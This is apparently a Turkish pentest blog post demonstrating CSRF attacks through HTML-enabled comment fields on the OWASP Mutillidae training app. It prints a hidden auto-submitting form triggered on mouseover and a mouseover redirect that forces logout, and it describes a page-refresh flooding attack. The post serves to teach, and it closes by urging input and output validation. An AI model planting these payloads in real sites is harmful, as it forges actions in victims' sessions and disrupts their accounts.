Yorum Ekleme Alanına CSRF Saldırısı Gerçekleştirme

Web uygulamalarında yorum alanlarını çok dikkatli kullandırtmak gerekiyor.Bu alanların girdileri ve çıktıları kontrol edilmeden işlem yaptırılırsa tehlikeli saldırılara maruz kalınabilinir.Bunun tipik örnekleri bu yorum alanlarının html destekli olarak kullanıcılara sunulmalarıdır. Html destekli alanlara CSRF-XSS saldırıları çok rahat gerçekleştirilir.
Biz bu makalede birkaç farklı CSRF saldırısı deneyeceğiz.
İlk olarak belirli bir alanın üzerine gelindiğinde CSRF ile kayıt ekleme saldırısı.
Bu uygulamayı OWASP-Mutillidae uygulaması üzerinden gerçekleştireceğiz.

Zararlı Kodlar

<form id="f" action="index.php?page=add-to-your-blog.php" method="post" enctype="application/x-www-form-urlencoded">
           <input type="hidden" name="csrf-token" value="best-guess"/>
           <input type="hidden" name="blog_entry" value="Add this guy to the Wall of Sheep"/>
           <input type="hidden" name="add-to-your-blog-php-submit-button" value="TESTING"/>
</form>
<i onmouseover="window.document.getElementById(\'f\').submit()">Dancing with the stars results
</i>

Bu kodları uygulamada test edelim.




ikinci uygulamamızda yine mouseover( ) olayının tetiklenmesi durumunda session-oturum düşmesi gerçekleşir.

Zararlı Kod:
<i onmouseover="window.document.location=\'http://localhost/mutillidae/index.php?do=logout\'">
How to improve your Facebook status
</i> 

Üçüncü uygulamada javascript kodu ile satır eklenir sayfa yenilenir, sayfa yenilendiği sürece satır eklenir. Bu da bir nevi DOS saldırısı gibi sayfanın kullanılamaz hale getirilmesini sağlar.


Görüldüğü gibi yorum alanlarından alınan yorumlar neticesinde ciddi açıklıklar oluştu.Bu nedenle yorum alanlarının girdileri  ve çıktıları mutlaka kontrol edilmelidir.


Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Web Pentest İşlemlerinde Burp Suite Kullanımı-1

Resim
Burp Suite, pentest işlemlerinde en çok kullanılan proxy programıdır. Web işlemleri gerçekleştirirken istemci-sunucu mimarisini kullanırız. Bir web sitesini incelemeye başladığımız zaman giden gelen verilere,isteklere,isteklerin gidiş dönüş şekillerine göre işlemler gerçekleştiririz. Pentest işlemlerin sağlıklı işlemesi için istemci ile sunucu arasında yapılan her işlemin gerek istemciden çıkıp sunucuya varmadan kontrolü gerekse de sunucudan istemciye dönen cevap istemciye varmadan araya girerek bakılması çok önemlidir. Burp Suite işte burada devreye girer ve istemci sunucu arasındaki tüm verileri kendi üzerinden geçirerek kendisinde mevcut bulunan özellikler ile test edilmesini sağlar.
Devamı

Web Pentest İşlemlerinde Burp Suite Kullanımı-2(Intruder Kullanımı)

Resim
Burp Suite'in kurulum ve browser ayarlarını  daha önce anlatmıştık.Şimdi web pentest işlemlerinde burp suite 'in gücünü görelim. Burp Suite'in Intruder (zorla giren anlamına gelen) özelliğini test edeceğiz." Intruder" sitede hedef seçilen parametreleri isterseniz el ile isterseniz hazır eklenebilecek kelimelerden oluşmuş liste ile sınama yapabileceğimiz bir özelliktir.Şimdi bir örnekle görselleştirelim.
Devamı

Wamp Server ile Yerel Ağınızda Site Yayınlama

Resim
Pentest işlemlerinde test ortamının elinizin altında olması anlık müdahale durumunun bulunması,etki tepkiyi hızlı ölçebilme,yapılan pentest işlemlerinde gerek savunma gerek saldırı vektörlerinin herhangi bir risk taşımadan gerçekleştirebilmesi adına Wamp server vb. araçlarla kendi yerel ağınızda hem sizin hem de yereldeki diğer kullanıcıların kullanacağı site veya siteleri oluşturabilirsiniz. Bunun için wamp server indirin ve kurun. Kurduktan sonra Windows ortamı için C:\\wamp\www dizi oluşacaktır. Test etmek veya kullanmak istediğiniz site dosyalarını buraya atın. Daha sonra wamp server ın kurulu olduğu bilgisayarda wamp server da apache içinde httpd.conf dosyasında aşağıdaki alanı bulun; #    Require all granted #   onlineoffline tag - don't remove      Order Deny,Allow      Deny from all      Allow from 127.0.0.1      Allow from ::1      Allow from localhost </Directory> Aş...
Devamı